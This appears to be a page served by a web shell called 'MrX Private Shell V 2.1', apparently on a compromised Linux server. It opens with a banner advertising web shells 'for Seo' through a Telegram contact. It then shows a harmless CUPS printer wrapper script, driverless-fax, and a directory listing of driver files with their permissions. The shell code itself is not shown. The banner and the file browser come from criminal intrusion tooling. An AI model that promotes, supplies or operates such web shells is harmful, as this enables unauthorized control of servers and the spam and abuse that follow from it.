__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh
#
# Note: This is only a wrapper for driverless-fax, the real work is done by
# driverless
#
# (C) 2020 Nidhi Jain
# (C) 2012-2020 Till Kamppeter <till.kamppeter@gmail.com>
#
# Released under GPL 2 or later
#
if [ $# -eq "0" ]; then
DEVICE_TYPE=FAX /usr/lib/cups/backend/driverless
elif [ $# -eq "1" ]; then
DEVICE_TYPE=FAX /usr/lib/cups/driver/driverless "$1"
elif [ $# -eq "2" ]; then
DEVICE_TYPE=FAX /usr/lib/cups/driver/driverless "$1" "$2"
else
echo "ERROR: Too many arguments"
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| driverless | File | 66.18 KB | 0755 |
|
| driverless-fax | File | 537 B | 0755 |
|
| escpr | File | 308.68 KB | 0755 |
|
| hplip | File | 176.44 KB | 0755 |
|
| hplip-data | File | 176.44 KB | 0755 |
|
| postscript-hp | File | 1.68 MB | 0755 |
|